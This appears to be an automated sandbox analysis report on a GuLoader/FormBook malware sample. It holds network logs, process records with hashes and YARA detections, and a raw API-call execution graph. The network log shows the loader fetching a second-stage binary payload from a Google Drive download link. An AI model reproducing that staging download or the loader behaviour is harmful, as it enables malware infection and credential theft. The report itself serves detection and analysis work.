                                                                                    Content-Security-Policy: script-src 'nonce-qP1l3IehTbOcaOTzzNMwaA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                    Content-Security-Policy: script-src 'unsafe-inline' 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factor=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                    Server: ESF
                                                                                    Content-Length: 0
                                                                                    X-XSS-Protection: 0
                                                                                    X-Frame-Options: SAMEORIGIN
                                                                                    X-Content-Type-Options: nosniff
                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                    Connection: close


                                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                    1 | 192.168.11.20 | 49758 | 142.250.65.161 | 443 | 9636 | C:\Users\user\Desktop\Grundforbedre39.exe
                                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                                    2024-03-18 13:47:26 UTC | 258 | OUT | GET /download?id=1Sej1a4Ej4CGXO3nSBc1G7q0rnimapqk0&export=download HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                                    Cache-Control: no-cache
                                                                                    Host: drive.usercontent.google.com
                                                                                    Connection: Keep-Alive
                                                                                    2024-03-18 13:47:27 UTC | 4695 | IN | HTTP/1.1 200 OK
                                                                                    X-GUploader-UploadID: ABPtcPoLFfaLqtJsZqpWXvsJW0dAm4ssqYZ0sveflEV2ysA-hvgCOtrWkGGpvqz-sHf48q67FwpFYXKuaw
                                                                                    Content-Type: application/octet-stream
                                                                                    Content-Security-Policy: sandbox
                                                                                    Content-Security-Policy: default-src 'none'
                                                                                    Content-Security-Policy: frame-ancestors 'none'
                                                                                    X-Content-Security-Policy: sandbox
                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                    Cross-Origin-Embedder-Policy: require-corp
                                                                                    Cross-Origin-Resource-Policy: same-site
                                                                                    X-Content-Type-Options: nosniff
                                                                                    Content-Disposition: attachment; filename="AsxSvHLPIWUyqjS57.bin"
                                                                                    Access-Control-Allow-Origin: *
                                                                                    Access-Control-Allow-Credentials: false
                                                                                    Access-Control-Allow-Headers: Accept, Accept-Language, Authorization, Cache-Control, Content-Disposition, Content-Encoding, Content-Language, Content-Length, Content-MD5, Content-Range, Content-Type, Date, developer-token, financial-institution-id, X-Goog-Sn-Metadata, X-Goog-Sn-PatientId, GData-Version, google-cloud-resource-prefix, linked-customer-id, login-customer-id, x-goog-request-params, Host, If-Match, If-Modified-Since, If-None-Match, If-Unmodified-Since, Origin, OriginToken, Pragma, Range, request-id, Slug, Transfer-Encoding, hotrod-board-name, hotrod-chrome-cpu-model, hotrod-chrome-processors, Want-Digest, X-Ad-Manager-Impersonation, x-chrome-connected, X-ClientDetails, X-Client-Version, x-debug-settings-metadata, X-Firebase-Locale, X-Goog-Firebase-Installations-Auth, X-Firebase-Client, X-Firebase-Client-Log-Type, X-Firebase-GMPID, X-Firebase-Auth-Token, X-Firebase-AppCheck, X-Firebase-Token, X-Goog-Drive-Client-Version, X-Goog-Drive-Resource-Keys, X-GData-Client, X-GData-Key, X-GoogApps-Allowed-Domains, X-Goog-AdX-Buyer-Impersonation, X-Goog-Api-Client, X-Goog-Visibilities, X-Goog-AuthUser, X-Google-EOM, x-goog-ext-124712974-jspb, x-goog-ext-467253834-jspb, x-goog-ext-353267353-bin, x-goog-ext-353267353-jspb, x-goog-ext-251363160-jspb, x-goog-ext-259736195-jspb, x-goog-ext-477772811-jspb, x-goog-ext-359275022-bin, x-goog-ext-328800237-jspb, x-goog-ext-202735639-bin, x-goog-ext-223435598-bin, X-Goog-PageId, X-Goog-Encode-Response-If-Executable, X-Goog-Correlation-Id, X-Goog-Request-Info, X-Goog-Request-Reason, X-Goog-Request-Time, X-Goog-Experiments, x-goog-iam-authority-selector, x-goog-iam-authorization-token, X-Goog-Spatula, X-Goog-Travel-Bgr, X-Goog-Travel-Settings, X-Goog-Upload-Command, X-Goog-Upload-Content-Disposition, X-Goog-Upload-Content-Length, X-Goog-Upload-Content-Type, X-Goog-Upload-File-Name, X-Goog-Upload-Header-Content-Encoding, 
X-Goog-Upload-Header-Content-Length, X-Goog-Upload-Header-Content-Type, X-Goog-Upload-Header-Transfer-Encoding, X-Goog-Upload-Offset, X-Goog-Upload-Protocol, x-goog-user-project, X-Goog-Visitor-Id, X-Goog-FieldMask, X-Google-Project-Override, x-goog-maps-api-salt, x-goog-maps-api-signature, x-goog-maps-client-id, X-Goog-Api-Key, x-goog-spanner-database-role, X-HTTP-Method-Override, X-JavaScript-User-Agent, X-Pan-Versionid, X-Proxied-User-IP, X-Origin, X-Referer, X-Requested-With, X-Stadia-Client-Context, X-Upload-Content-Length, X-Upload-Content-Type, X-Use-Alt-Service, X-Use-HTTP-Status-Code-Override, X-Ios-Bundle-Identifier, X-Android-Package, X-Android-Cert, X-Ariane-Xsrf-Token, X-YouTube-Bootstrap-Logged-In, X-YouTube-VVT, X-YouTube-Page-CL, X-YouTube-Page-Timestamp, X-Compass-Routing-Destination, x-framework-xsrf-token, X-Goog-Meeting-ABR, X-Goog-Meeting-Botguardid, X-Goog-Meeting-ClientInfo, X-Goog-Meeting-ClientVersion, X-Goog-Meeting-Debugid, X-Goog-Meeting-Identifier, X-Goog-Meeting-Interop-Cohorts, X-Goog-Meeting-Interop-Type, X-Goog-Meeting-OidcIdToken, X-Goog-Meeting-RtcClient, X-Goog-Meeting-StartSource, X-Goog-Meeting-Token, X-Goog-Meeting-Viewer-Token, X-Client-Data, x-sdm-id-token, X-Sfdc-Authorization, MIME-Version, Content-Transfer-Encoding, X-Earth-Engine-App-ID-Token, X-Earth-Engine-Computation-Profile, X-Earth-Engine-Computation-Profiling, X-Play-Console-Experiments-Override, X-Play-Console-Session-Id, x-alkali-account-key, x-alkali-application-key, x-alkali-auth-apps-namespace, x-alkali-auth-entities-namespace, x-alkali-auth-entity, x-alkali-client-locale, EES-S7E-MODE, cast-device-capabilities, X-Server-Timeout, x-foyer-client-environment, x-goog-greenenergyuserappservice-metadata, x-goog-sherlog-context, X-Server-Token, x-rfui-request-context
                                                                                    Access-Control-Allow-Methods: GET,HEAD,OPTIONS
                                                                                    Accept-Ranges: bytes
                                                                                    Content-Length: 275008
                                                                                    Last-Modified: Tue, 12 Mar 2024 11:01:13 GMT
                                                                                    Date: Mon, 18 Mar 2024 13:47:27 GMT
                                                                                    Expires: Mon, 18 Mar 2024 13:47:27 GMT
                                                                                    Cache-Control: private, max-age=0
                                                                                    X-Goog-Hash: crc32c=tte7TA==
                                                                                    Server: UploadServer
                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                    Connection: close



                                                                                    Target ID:0
                                                                                    Start time:14:46:52
                                                                                    Start date:18/03/2024
                                                                                    Path:C:\Users\user\Desktop\Grundforbedre39.exe
                                                                                    Wow64 process (32bit):true
                                                                                    Commandline:C:\Users\user\Desktop\Grundforbedre39.exe
                                                                                    Imagebase:0x400000
                                                                                    File size:786'800 bytes
                                                                                    MD5 hash:0190A49F09DC90C7DC61959581BE1E9F
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Yara matches:
                                                                                    • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000000.00000002.1134826419.000000000785E000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                    Reputation:low
                                                                                    Has exited:true

                                                                                    Target ID:4
                                                                                    Start time:14:47:17
                                                                                    Start date:18/03/2024
                                                                                    Path:C:\Users\user\Desktop\Grundforbedre39.exe
                                                                                    Wow64 process (32bit):true
                                                                                    Commandline:C:\Users\user\Desktop\Grundforbedre39.exe
                                                                                    Imagebase:0x400000
                                                                                    File size:786'800 bytes
                                                                                    MD5 hash:0190A49F09DC90C7DC61959581BE1E9F
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Yara matches:
                                                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.1279164974.0000000038030000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000004.00000002.1279164974.0000000038030000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.1278316788.00000000351C0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000004.00000002.1278316788.00000000351C0000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                                                    Reputation:low
                                                                                    Has exited:true

                                                                                    Target ID:9
                                                                                    Start time:14:47:31
                                                                                    Start date:18/03/2024
                                                                                    Path:C:\Program Files (x86)\ERtdTuDynHEWlexRohovBzgsqckTyNaQESBJWivIAgzOBz\aBVmlEGlXzPgSgzWbUWNbhsRlSOqo.exe
                                                                                    Wow64 process (32bit):true
                                                                                    Commandline:"C:\Program Files (x86)\ERtdTuDynHEWlexRohovBzgsqckTyNaQESBJWivIAgzOBz\aBVmlEGlXzPgSgzWbUWNbhsRlSOqo.exe"
                                                                                    Imagebase:0xa50000
                                                                                    File size:140'800 bytes
                                                                                    MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                    Has elevated privileges:false
                                                                                    Has administrator privileges:false
                                                                                    Programmed in:C, C++ or other language
                                                                                    Yara matches:
                                                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000009.00000002.5892807319.0000000004CA0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                                                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000009.00000002.5892807319.0000000004CA0000.00000040.00000001.00040000.00000000.sdmp, Author: unknown
                                                                                    Reputation:high
                                                                                    Has exited:false

                                                                                    Target ID:10
                                                                                    Start time:14:47:32
                                                                                    Start date:18/03/2024
                                                                                    Path:C:\Windows\SysWOW64\netiougc.exe
                                                                                    Wow64 process (32bit):true
                                                                                    Commandline:C:\Windows\SysWOW64\netiougc.exe
                                                                                    Imagebase:0x830000
                                                                                    File size:25'600 bytes
                                                                                    MD5 hash:DD8D09523CDB5610078DF64BA4889806
                                                                                    Has elevated privileges:false
                                                                                    Has administrator privileges:false
                                                                                    Programmed in:C, C++ or other language
                                                                                    Yara matches:
                                                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000A.00000002.5887373637.00000000004A0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000A.00000002.5887373637.00000000004A0000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000A.00000002.5894036244.0000000002B60000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000A.00000002.5894036244.0000000002B60000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000A.00000002.5893764662.0000000002B10000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000A.00000002.5893764662.0000000002B10000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                    Reputation:moderate
                                                                                    Has exited:false

                                                                                    Target ID:25
                                                                                    Start time:14:47:45
                                                                                    Start date:18/03/2024
                                                                                    Path:C:\Program Files (x86)\ERtdTuDynHEWlexRohovBzgsqckTyNaQESBJWivIAgzOBz\aBVmlEGlXzPgSgzWbUWNbhsRlSOqo.exe
                                                                                    Wow64 process (32bit):true
                                                                                    Commandline:"C:\Program Files (x86)\ERtdTuDynHEWlexRohovBzgsqckTyNaQESBJWivIAgzOBz\aBVmlEGlXzPgSgzWbUWNbhsRlSOqo.exe"
                                                                                    Imagebase:0xa50000
                                                                                    File size:140'800 bytes
                                                                                    MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                    Has elevated privileges:false
                                                                                    Has administrator privileges:false
                                                                                    Programmed in:C, C++ or other language
                                                                                    Yara matches:
                                                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000019.00000002.5892016375.0000000000E30000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000019.00000002.5892016375.0000000000E30000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                                                    Reputation:high
                                                                                    Has exited:false

                                                                                    Target ID:26
                                                                                    Start time:14:47:58
                                                                                    Start date:18/03/2024
                                                                                    Path:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:C:\Program Files\Mozilla Firefox\Firefox.exe
                                                                                    Imagebase:0x7ff77a870000
                                                                                    File size:597'432 bytes
                                                                                    MD5 hash:FA9F4FC5D7ECAB5A20BF7A9D1251C851
                                                                                    Has elevated privileges:false
                                                                                    Has administrator privileges:false
                                                                                    Programmed in:C, C++ or other language
                                                                                    Reputation:moderate
                                                                                    Has exited:true


                                                                                      Execution Graph

                                                                                      Execution Coverage:21.2%
                                                                                      Dynamic/Decrypted Code Coverage:13.7%
                                                                                      Signature Coverage:23.2%
                                                                                      Total number of Nodes:1536
                                                                                      Total number of Limit Nodes:44
calls 4815->4818 4816->4805 4816->4814 4817 405179 25 API calls 4816->4817 4820 405179 25 API calls 4816->4820 4821 405ebb 38 API calls 4816->4821 4824 4057c3 4816->4824 4817->4805 4819 4059bd 4818->4819 4819->4788 4820->4816 4821->4816 4822->4791 4823->4807 4825 405bca 2 API calls 4824->4825 4826 4057cf 4825->4826 4827 4057f0 4826->4827 4828 4057e6 DeleteFileW 4826->4828 4829 4057de RemoveDirectoryW 4826->4829 4827->4816 4830 4057ec 4828->4830 4829->4830 4830->4827 4831 4057fc SetFileAttributesW 4830->4831 4831->4827 4833 405d71 4832->4833 4834 405d97 GetShortPathNameW 4832->4834 4859 405bef GetFileAttributesW CreateFileW 4833->4859 4836 405eb6 4834->4836 4837 405dac 4834->4837 4836->4726 4837->4836 4839 405db4 wsprintfA 4837->4839 4838 405d7b CloseHandle GetShortPathNameW 4838->4836 4840 405d8f 4838->4840 4841 40603c 18 API calls 4839->4841 4840->4834 4840->4836 4842 405ddc 4841->4842 4860 405bef GetFileAttributesW CreateFileW 4842->4860 4844 405de9 4844->4836 4845 405df8 GetFileSize GlobalAlloc 4844->4845 4846 405e1a 4845->4846 4847 405eaf CloseHandle 4845->4847 4848 405c72 ReadFile 4846->4848 4847->4836 4849 405e22 4848->4849 4849->4847 4861 405b54 lstrlenA 4849->4861 4852 405e39 lstrcpyA 4855 405e5b 4852->4855 4853 405e4d 4854 405b54 4 API calls 4853->4854 4854->4855 4856 405e92 SetFilePointer 4855->4856 4857 405ca1 WriteFile 4856->4857 4858 405ea8 GlobalFree 4857->4858 4858->4847 4859->4838 4860->4844 4862 405b95 lstrlenA 4861->4862 4863 405b6e lstrcmpiA 4862->4863 4864 405b9d 4862->4864 4863->4864 4865 405b8c CharNextA 4863->4865 4864->4852 4864->4853 4865->4862 5235 4021ea 5236 402bbf 18 API calls 5235->5236 5237 4021f0 5236->5237 5238 402bbf 18 API calls 5237->5238 5239 4021f9 5238->5239 5240 402bbf 18 API calls 5239->5240 5241 402202 5240->5241 5242 40635d 2 API calls 5241->5242 5243 40220b 5242->5243 5244 40221c lstrlenW lstrlenW 5243->5244 5245 40220f 5243->5245 5247 405179 25 API calls 5244->5247 5246 405179 25 API calls 5245->5246 5249 402217 
5245->5249 5246->5249 5248 40225a SHFileOperationW 5247->5248 5248->5245 5248->5249 4882 40156b 4883 401584 4882->4883 4884 40157b ShowWindow 4882->4884 4885 401592 ShowWindow 4883->4885 4886 402a4c 4883->4886 4884->4883 4885->4886 5257 4050ed 5258 405111 5257->5258 5259 4050fd 5257->5259 5261 405119 IsWindowVisible 5258->5261 5267 405130 5258->5267 5260 405103 5259->5260 5269 40515a 5259->5269 5263 40412a SendMessageW 5260->5263 5264 405126 5261->5264 5261->5269 5262 40515f CallWindowProcW 5265 40510d 5262->5265 5263->5265 5270 404a43 SendMessageW 5264->5270 5267->5262 5275 404ac3 5267->5275 5269->5262 5271 404aa2 SendMessageW 5270->5271 5272 404a66 GetMessagePos ScreenToClient SendMessageW 5270->5272 5273 404a9a 5271->5273 5272->5273 5274 404a9f 5272->5274 5273->5267 5274->5271 5284 40601a lstrcpynW 5275->5284 5277 404ad6 5285 405f61 wsprintfW 5277->5285 5279 404ae0 5280 40140b 2 API calls 5279->5280 5281 404ae9 5280->5281 5286 40601a lstrcpynW 5281->5286 5283 404af0 5283->5269 5284->5277 5285->5279 5286->5283 5287 40226e 5288 402275 5287->5288 5291 402288 5287->5291 5289 40603c 18 API calls 5288->5289 5290 402282 5289->5290 5292 40575f MessageBoxIndirectW 5290->5292 5292->5291 5293 402870 5315 405bef GetFileAttributesW CreateFileW 5293->5315 5295 402877 5296 402883 GlobalAlloc 5295->5296 5297 40291a 5295->5297 5298 402911 CloseHandle 5296->5298 5299 40289c 5296->5299 5300 402922 DeleteFileW 5297->5300 5301 402935 5297->5301 5298->5297 5316 403222 SetFilePointer 5299->5316 5300->5301 5303 4028a2 5304 40320c ReadFile 5303->5304 5305 4028ab GlobalAlloc 5304->5305 5306 4028bb 5305->5306 5307 4028ef 5305->5307 5309 403027 36 API calls 5306->5309 5308 405ca1 WriteFile 5307->5308 5310 4028fb GlobalFree 5308->5310 5314 4028c8 5309->5314 5311 403027 36 API calls 5310->5311 5312 40290e 5311->5312 5312->5298 5313 4028e6 GlobalFree 5313->5307 5314->5313 5315->5295 5316->5303 5317 4014f1 SetForegroundWindow 5318 402a4c 5317->5318 5319 4041f2 lstrcpynW lstrlenW 4891 401673 
4892 402bbf 18 API calls 4891->4892 4893 40167a 4892->4893 4894 402bbf 18 API calls 4893->4894 4895 401683 4894->4895 4896 402bbf 18 API calls 4895->4896 4897 40168c MoveFileW 4896->4897 4898 40169f 4897->4898 4904 401698 4897->4904 4899 40635d 2 API calls 4898->4899 4902 4021e1 4898->4902 4901 4016ae 4899->4901 4900 401423 25 API calls 4900->4902 4901->4902 4903 405ebb 38 API calls 4901->4903 4903->4904 4904->4900 5320 404af5 GetDlgItem GetDlgItem 5321 404b47 7 API calls 5320->5321 5327 404d60 5320->5327 5322 404bea DeleteObject 5321->5322 5323 404bdd SendMessageW 5321->5323 5324 404bf3 5322->5324 5323->5322 5325 404c2a 5324->5325 5326 40603c 18 API calls 5324->5326 5328 4040de 19 API calls 5325->5328 5330 404c0c SendMessageW SendMessageW 5326->5330 5334 404e44 5327->5334 5337 404a43 5 API calls 5327->5337 5357 404dd1 5327->5357 5333 404c3e 5328->5333 5329 404ef0 5331 404f02 5329->5331 5332 404efa SendMessageW 5329->5332 5330->5324 5341 404f14 ImageList_Destroy 5331->5341 5342 404f1b 5331->5342 5352 404f2b 5331->5352 5332->5331 5338 4040de 19 API calls 5333->5338 5334->5329 5339 404e9d SendMessageW 5334->5339 5363 404d53 5334->5363 5335 404145 8 API calls 5340 4050e6 5335->5340 5336 404e36 SendMessageW 5336->5334 5337->5357 5358 404c4c 5338->5358 5344 404eb2 SendMessageW 5339->5344 5339->5363 5341->5342 5345 404f24 GlobalFree 5342->5345 5342->5352 5343 40509a 5348 4050ac ShowWindow GetDlgItem ShowWindow 5343->5348 5343->5363 5347 404ec5 5344->5347 5345->5352 5346 404d21 GetWindowLongW SetWindowLongW 5349 404d3a 5346->5349 5353 404ed6 SendMessageW 5347->5353 5348->5363 5350 404d40 ShowWindow 5349->5350 5351 404d58 5349->5351 5371 404113 SendMessageW 5350->5371 5372 404113 SendMessageW 5351->5372 5352->5343 5362 404ac3 4 API calls 5352->5362 5367 404f66 5352->5367 5353->5329 5354 404d1b 5354->5346 5354->5349 5357->5334 5357->5336 5358->5346 5358->5354 5359 404c9c SendMessageW 5358->5359 5360 404cd8 SendMessageW 5358->5360 5361 404ce9 SendMessageW 5358->5361 
5359->5358 5360->5358 5361->5358 5362->5367 5363->5335 5364 405070 InvalidateRect 5364->5343 5365 405086 5364->5365 5373 4049fe 5365->5373 5366 404f94 SendMessageW 5370 404faa 5366->5370 5367->5366 5367->5370 5369 40501e SendMessageW SendMessageW 5369->5370 5370->5364 5370->5369 5371->5363 5372->5327 5376 404935 5373->5376 5375 404a13 5375->5343 5377 40494e 5376->5377 5378 40603c 18 API calls 5377->5378 5379 4049b2 5378->5379 5380 40603c 18 API calls 5379->5380 5381 4049bd 5380->5381 5382 40603c 18 API calls 5381->5382 5383 4049d3 lstrlenW wsprintfW SetDlgItemTextW 5382->5383 5383->5375 5384 100016b6 5385 100016e5 5384->5385 5386 10001b18 22 API calls 5385->5386 5387 100016ec 5386->5387 5388 100016f3 5387->5388 5389 100016ff 5387->5389 5390 10001272 2 API calls 5388->5390 5391 10001726 5389->5391 5392 10001709 5389->5392 5395 100016fd 5390->5395 5393 10001750 5391->5393 5394 1000172c 5391->5394 5396 1000153d 3 API calls 5392->5396 5399 1000153d 3 API calls 5393->5399 5398 100015b4 3 API calls 5394->5398 5397 1000170e 5396->5397 5400 100015b4 3 API calls 5397->5400 5401 10001731 5398->5401 5399->5395 5402 10001714 5400->5402 5403 10001272 2 API calls 5401->5403 5404 10001272 2 API calls 5402->5404 5405 10001737 GlobalFree 5403->5405 5406 1000171a GlobalFree 5404->5406 5405->5395 5407 1000174b GlobalFree 5405->5407 5406->5395 5407->5395 5408 10002238 5409 10002296 5408->5409 5410 100022cc 5408->5410 5409->5410 5411 100022a8 GlobalAlloc 5409->5411 5411->5409 5412 404579 5413 4045a5 5412->5413 5414 4045b6 5412->5414 5473 405743 GetDlgItemTextW 5413->5473 5416 4045c2 GetDlgItem 5414->5416 5449 404621 5414->5449 5422 4045d6 5416->5422 5417 4045b0 5418 4062ae 5 API calls 5417->5418 5418->5414 5419 4048b4 5426 404145 8 API calls 5419->5426 5421 4045ea SetWindowTextW 5425 4040de 19 API calls 5421->5425 5422->5421 5427 405a79 4 API calls 5422->5427 5423 404735 5428 405ad6 18 API calls 5423->5428 5424 40603c 18 API calls 5429 404695 SHBrowseForFolderW 5424->5429 5430 404606 
5425->5430 5431 4048c8 5426->5431 5432 4045e0 5427->5432 5433 40473b 5428->5433 5434 404705 5429->5434 5435 4046ad CoTaskMemFree 5429->5435 5436 4040de 19 API calls 5430->5436 5432->5421 5437 4059ce 3 API calls 5432->5437 5476 40601a lstrcpynW 5433->5476 5434->5419 5475 405743 GetDlgItemTextW 5434->5475 5438 4059ce 3 API calls 5435->5438 5439 404614 5436->5439 5437->5421 5440 4046ba 5438->5440 5474 404113 SendMessageW 5439->5474 5443 4046f1 SetDlgItemTextW 5440->5443 5448 40603c 18 API calls 5440->5448 5443->5434 5444 40461a 5446 4063f4 5 API calls 5444->5446 5445 404752 5447 4063f4 5 API calls 5445->5447 5446->5449 5456 404759 5447->5456 5450 4046d9 lstrcmpiW 5448->5450 5449->5419 5449->5424 5449->5434 5450->5443 5453 4046ea lstrcatW 5450->5453 5451 40479a 5477 40601a lstrcpynW 5451->5477 5453->5443 5454 4047a1 5455 405a79 4 API calls 5454->5455 5457 4047a7 GetDiskFreeSpaceW 5455->5457 5456->5451 5459 405a1a 2 API calls 5456->5459 5461 4047f2 5456->5461 5460 4047cb MulDiv 5457->5460 5457->5461 5459->5456 5460->5461 5462 404863 5461->5462 5463 4049fe 21 API calls 5461->5463 5464 404886 5462->5464 5465 40140b 2 API calls 5462->5465 5466 404850 5463->5466 5478 404100 KiUserCallbackDispatcher 5464->5478 5465->5464 5468 404865 SetDlgItemTextW 5466->5468 5469 404855 5466->5469 5468->5462 5471 404935 21 API calls 5469->5471 5470 4048a2 5470->5419 5479 40450e 5470->5479 5471->5462 5473->5417 5474->5444 5475->5423 5476->5445 5477->5454 5478->5470 5480 404521 SendMessageW 5479->5480 5481 40451c 5479->5481 5480->5419 5481->5480 5482 401cfa GetDlgItem GetClientRect 5483 402bbf 18 API calls 5482->5483 5484 401d2c LoadImageW SendMessageW 5483->5484 5485 401d4a DeleteObject 5484->5485 5486 402a4c 5484->5486 5485->5486 4987 40237b 4988 402381 4987->4988 4989 402bbf 18 API calls 4988->4989 4990 402393 4989->4990 4991 402bbf 18 API calls 4990->4991 4992 40239d RegCreateKeyExW 4991->4992 4993 4023c7 4992->4993 4996 40281e 4992->4996 4994 4023e2 4993->4994 4995 402bbf 18 API calls 
4993->4995 4998 402ba2 18 API calls 4994->4998 5002 4023ee 4994->5002 4997 4023d8 lstrlenW 4995->4997 4997->4994 4998->5002 4999 402409 RegSetValueExW 5001 40241f RegCloseKey 4999->5001 5000 403027 36 API calls 5000->4999 5001->4996 5002->4999 5002->5000 5004 4027fb 5005 402bbf 18 API calls 5004->5005 5006 402802 FindFirstFileW 5005->5006 5007 40282a 5006->5007 5011 402815 5006->5011 5009 402833 5007->5009 5012 405f61 wsprintfW 5007->5012 5013 40601a lstrcpynW 5009->5013 5012->5009 5013->5011 5487 40427b 5489 4043ad 5487->5489 5490 404293 5487->5490 5488 404417 5491 404421 GetDlgItem 5488->5491 5492 4044e9 5488->5492 5489->5488 5489->5492 5497 4043e8 GetDlgItem SendMessageW 5489->5497 5495 4040de 19 API calls 5490->5495 5493 4044aa 5491->5493 5494 40443b 5491->5494 5496 404145 8 API calls 5492->5496 5493->5492 5502 4044bc 5493->5502 5494->5493 5501 404461 6 API calls 5494->5501 5498 4042fa 5495->5498 5500 4044e4 5496->5500 5518 404100 KiUserCallbackDispatcher 5497->5518 5499 4040de 19 API calls 5498->5499 5504 404307 CheckDlgButton 5499->5504 5501->5493 5505 4044d2 5502->5505 5506 4044c2 SendMessageW 5502->5506 5516 404100 KiUserCallbackDispatcher 5504->5516 5505->5500 5509 4044d8 SendMessageW 5505->5509 5506->5505 5507 404412 5510 40450e SendMessageW 5507->5510 5509->5500 5510->5488 5511 404325 GetDlgItem 5517 404113 SendMessageW 5511->5517 5513 40433b SendMessageW 5514 404361 SendMessageW SendMessageW lstrlenW SendMessageW SendMessageW 5513->5514 5515 404358 GetSysColor 5513->5515 5514->5500 5515->5514 5516->5511 5517->5513 5518->5507 5519 1000103d 5520 1000101b 5 API calls 5519->5520 5521 10001056 5520->5521 5522 4014ff 5523 401507 5522->5523 5525 40151a 5522->5525 5524 402ba2 18 API calls 5523->5524 5524->5525 5526 401000 5527 401037 BeginPaint GetClientRect 5526->5527 5528 40100c DefWindowProcW 5526->5528 5530 4010f3 5527->5530 5531 401179 5528->5531 5532 401073 CreateBrushIndirect FillRect DeleteObject 5530->5532 5533 4010fc 5530->5533 5532->5530 5534 401102 
CreateFontIndirectW 5533->5534 5535 401167 EndPaint 5533->5535 5534->5535 5536 401112 6 API calls 5534->5536 5535->5531 5536->5535 5544 401904 5545 40193b 5544->5545 5546 402bbf 18 API calls 5545->5546 5547 401940 5546->5547 5548 40580b 69 API calls 5547->5548 5549 401949 5548->5549 5550 402d04 5551 402d16 SetTimer 5550->5551 5552 402d2f 5550->5552 5551->5552 5553 402d84 5552->5553 5554 402d49 MulDiv wsprintfW SetWindowTextW SetDlgItemTextW 5552->5554 5554->5553 4293 403c06 4294 403d59 4293->4294 4295 403c1e 4293->4295 4297 403daa 4294->4297 4298 403d6a GetDlgItem GetDlgItem 4294->4298 4295->4294 4296 403c2a 4295->4296 4300 403c35 SetWindowPos 4296->4300 4301 403c48 4296->4301 4299 403e04 4297->4299 4307 401389 2 API calls 4297->4307 4302 4040de 19 API calls 4298->4302 4308 403d54 4299->4308 4363 40412a 4299->4363 4300->4301 4304 403c65 4301->4304 4305 403c4d ShowWindow 4301->4305 4306 403d94 SetClassLongW 4302->4306 4309 403c87 4304->4309 4310 403c6d DestroyWindow 4304->4310 4305->4304 4311 40140b 2 API calls 4306->4311 4315 403ddc 4307->4315 4313 403c8c SetWindowLongW 4309->4313 4314 403c9d 4309->4314 4312 404067 4310->4312 4311->4297 4312->4308 4324 404098 ShowWindow 4312->4324 4313->4308 4316 403d46 4314->4316 4317 403ca9 GetDlgItem 4314->4317 4315->4299 4318 403de0 SendMessageW 4315->4318 4382 404145 4316->4382 4321 403cd9 4317->4321 4322 403cbc SendMessageW IsWindowEnabled 4317->4322 4318->4308 4319 40140b 2 API calls 4332 403e16 4319->4332 4320 404069 DestroyWindow EndDialog 4320->4312 4326 403ce6 4321->4326 4329 403d2d SendMessageW 4321->4329 4330 403cf9 4321->4330 4338 403cde 4321->4338 4322->4308 4322->4321 4324->4308 4325 40603c 18 API calls 4325->4332 4326->4329 4326->4338 4328 4040de 19 API calls 4328->4332 4329->4316 4333 403d01 4330->4333 4334 403d16 4330->4334 4331 403d14 4331->4316 4332->4308 